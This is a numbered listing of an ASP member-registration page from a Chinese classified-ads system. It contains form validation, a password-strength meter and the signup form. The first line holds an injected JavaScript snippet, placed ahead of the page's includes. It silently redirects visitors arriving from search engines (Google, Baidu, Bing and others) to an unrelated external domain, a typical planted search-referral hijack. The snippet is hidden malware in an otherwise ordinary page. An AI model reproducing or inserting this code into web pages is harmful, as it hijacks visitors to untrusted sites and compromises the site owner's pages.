d:\wwwroot\wuchunhua\kqiqi_reg_520.asp

001: <script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script><!--#include file="inc/conn.asp"-->
002: <!--#include file="inc/kqiqi_sub.asp"-->
003: <!--#include file="stop_post.asp"-->
004: <%
005: '    @@@@@@ www.kqiqi.com @@@@@@@@@@@@@@@@@
006: '   @                                        @
007: '  @                                          @
008: '  @   客齐齐分管理系统,做最好的分类系统。   @
009: '  @                                          @
010: '   @                                        @
011: '    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
012: %
>
013: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
014: <html xmlns="http://www.w3.org/1999/xhtml">
015: <head>
016: <title><%=title%>-注册会员-第一步</title>
017: <meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
018: <meta http-equiv="Content-Language" content="zh-cn" />
019: <meta name="Keywords"  content="<%=metakey%>" />
020: <meta name="Description" content="<%=metades%>" />
021: <link rel="icon" href="<%=web%>/favicon.ico" type="image/x-icon" />
022: <link rel="shortcut icon" href="<%=web%>/favicon.ico" type="image/x-icon" />
023: <link href="inc/style.css" rel="stylesheet" type="text/css" />
024: <SCRIPT language=javascript>
025: <!--
026: function CheckForm()
027: {
028: if(document.thisForm.username.value.length<1)
029:    {
030:        alert("用户名称不能为空!");
031:        document.thisForm.username.focus();
032:        return false;
033:    }
034:         var filter=/^\s*[.A-Za-z0-9_-]{5,15}\s*$/;
035:         if (!filter.test(document.thisForm.username.value)) {
036:                 alert("用户名填写不正确,请重新填写!可使用的字符为(A-Z a-z 0-9 _ - .)长度不小于5个字符,不超过15个字符,注意不要使用空格。");
037:                 document.thisForm.username.focus();
038:                 document.thisForm.username.select();
039:                 return (false);
040:                 }
041:                 
042:    if(document.thisForm.password.value.length<6)
043:    {
044:        alert("用户密码不能为空或少于6位!");
045:        document.thisForm.password.focus();
046:         document.thisForm.password.select();
047:        return false;
048:    }
049: if(document.thisForm.password1.value.length<6)
050:    {
051:        alert("确认密码不能为空或少于6位!");
052:         document.thisForm.password1.focus();
053:         document.thisForm.password1.select();
054:        return false;
055:    }
056: if (document.thisForm.password.value!=document.thisForm.password1.value ){
057:               alert("两次填写的密码不一致,请重新填写!");
058:                 document.thisForm.password.focus();
059:                 document.thisForm.password.select();
060:                 return (false);
061:                 }
062: }
063: //-->

064: </SCRIPT>
065: <style type="text/css">
066: #pwdpower {
067:    width:195px;
068:    border:0px none;
069:    background-color:#f1f1f1
070: }
071: #pwdpower td {
072:    text-align:center;
073:    vertical-align:middle;
074:    padding:1px;
075:    color:#adadac;
076: }
077: #pwdpower #pweak{
078:    border-right:1px solid #dedede;
079: }
080: #pwdpower #pmedium{
081:    border-right:1px solid #dedede;
082: }
083: #pwdpower #pstrong{
084:
085: }
086: </style>
087: <script type="text/javascript" src="inc/checkpwd.js"></script>
088: </head>
089: <body>
090: <%
091: if userreg="0" then
092: response.redirect "err/err.html"
093: else
094: %
>
095: <div id="Fmain">
096: <div id="header">
097: <%call top()%>
098: </div>
099: <div class=kon></div>
100: <div id=FFTit class=F12bold><a href="/">首页</a>→<a href="kqiqi_reg_520.asp">注册会员第一步</a></div><div id=FFContent><div Class='FFdiv'>
101: <table width="965" border="0" bordercolor="#FFFFFF" cellpadding="0" style="border-collapse: collapse">
102: <form method="POST" name="thisForm" action="kqiqi_reg_check_520.asp">
103: <tr><td height="40"><p align="center">请慎重选择您是个人用户还是商家用户</td></tr>
104: <tr><td height="26"><p align="center">登陆帐号:<input type="text" maxlength="12" name="username" size="20"><font color="#FF0000"> * </font>6-15个英文或数字</td></tr>
105: <tr><td height="26"><p align="center">登陆密码:<input type="password" maxlength="16" id="ipassword"  value=""  class="it" name="password" size="20" onchange="javascript:EvalPwd(this.value);" onkeyup="javascript:EvalPwd(this.value);"> <font color="#FF0000">*</font>
106: 6-11个英文或数字
107: </td>
108: </tr>
109: <tr>
110: <td>
111: <div align=center>
112: <table cellpadding="0" cellspacing="0"  border="0" id="pwdpower">
113: <tr>
114: <td id="pweak" style="">弱</td>
115: <td id="pmedium" style="">中</td>
116: <td id="pstrong" style="">强</td>
117: </tr>
118: </table>
119: </div>
120: </td></tr>
121: <tr><td height="26"><p align="center">确认密码:<input type="password" maxlength="16" name="password1" size="20" > <font color="#FF0000">*</font>密码请保持
122:    为一致</td></tr>
123: <tr><td height="26" align="right"><p align="center"><input type="radio" value="1" checked name="per">个人会员 <input type="radio" name="per" value="2">商家会员</td></tr>
124: <tr><td height="26" align="right"><p align="center"><a target=_blank href="Agreement.asp">
125:    <font color="#0000FF">同意并接受本站注册协议</font></a></td></tr>
126: <tr><td height="50"><p align="center"><input type="image" onclick="javascript:return CheckForm();" src="image/register_submit.gif" value="确定注册" name="B1" style="font-weight:bold;font-size: 12pt;height:50"></td></tr>
127: </form></table>
128: </div></div>
129: <br style="clear:both;" />
130: <div class=kon></div>
131: <div class=kon></div>
132: <div id="footer">
133:
134: <%call bottom()%>
135: </div>
136: </div>
137: <%end if%>
138: </body></html>
139:
140: